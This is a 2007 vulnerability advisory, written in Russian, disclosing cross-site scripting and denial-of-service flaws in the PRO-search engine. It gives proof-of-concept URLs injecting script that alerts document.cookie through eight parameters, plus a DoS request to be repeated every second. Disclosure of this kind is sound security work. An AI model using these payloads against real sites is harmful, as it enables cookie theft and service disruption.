Vulnerabilities in PRO-search

2007-12-26T00:00:00
ID SECURITYVULNS:DOC:18731
Type securityvulns
Reporter Securityvulns
Modified 2007-12-26T00:00:00

Description

Здравствуйте 3APA3A!

Сообщаю вам о найденной мною Cross-Site Scripting и Denial of Service уязвимостях в PRO-search.

XSS:

Уязвимости на главной странице в параметрах prot, host, path, name, ext, size, search_days, show_page.

http://site/?prot=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/?host=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/?path=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/?name=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/?ext=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/?size=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/?search_days=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/?show_page=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Denial of Service:

http://site/?show_page=20000&time=0

Поисковик ищет по всем файлам, что может привести к DoS (чем больше значение show_page, тем большая задержка сервера). DoS кратковременный, поэтому для проведения DoS атаки нужно регулярно (ежесекундно) посылать запрос к серверу.

Дополнительная информация о данных уязвимостях у меня на сайте: http://websecurity.com.ua/1259/

Уязвимы версии PRO-search 0.17.x и все предыдущие версии.

Best wishes & regards, MustLive Администратор сайта http://websecurity.com.ua